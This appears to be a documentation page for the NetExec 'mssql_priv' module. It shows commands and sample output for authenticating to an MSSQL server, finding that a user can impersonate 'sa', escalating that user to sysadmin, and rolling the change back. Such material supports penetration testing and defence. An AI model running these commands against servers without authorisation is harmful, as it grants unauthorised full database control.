MSSQL PrivEsc
Module to privesc from standard user to DBA
Last updated
Was this helpful?
Module to privesc from standard user to DBA
Last updated
Was this helpful?
Was this helpful?
nxc mssql <ip> -u user -p password
MSSQL <ip> 1433 FQDN [*] Windows 10 / Server 2019 Build 17763 (name:FQDN) (domain:FQDN.local)
MSSQL <ip> 1433 FQDN [+] FQDN\user:password
nxc mssql <ip> -u user -p password -M mssql_priv
MSSQL <ip> 1433 FQDN [*] Windows 10 / Server 2019 Build 17763 (name:FQDN) (domain:FQDN.local)
MSSQL <ip> 1433 FQDN [+] FQDN\user:password
MSSQL_PRIV <ip> 1433 FQDN [+] FQDN\user can impersonate: sa (sysadmin)
nxc mssql <ip> -u user -p password -M mssql_priv -o ACTION=privesc
MSSQL <ip> 1433 FQDN [*] Windows 10 / Server 2019 Build 17763 (name:FQDN) (domain:FQDN.local)
MSSQL <ip> 1433 FQDN [+] FQDN\user:password
MSSQL_PRIV <ip> 1433 FQDN [+] FQDN\user can impersonate: sa (sysadmin)
MSSQL_PRIV <ip> 1433 FQDN [+] FQDN\user is now a sysadmin! (Pwn3d!)
nxc mssql <ip> -u user -p password -M mssql_priv -o ACTION=rollback
MSSQL <ip> 1433 FQDN [*] Windows 10 / Server 2019 Build 17763 (name:FQDN) (domain:FQDN.local)
MSSQL <ip> 1433 FQDN [+] FQDN\user:password (Pwn3d!)
MSSQL_PRIV <ip> 1433 FQDN [+] sysadmin role removed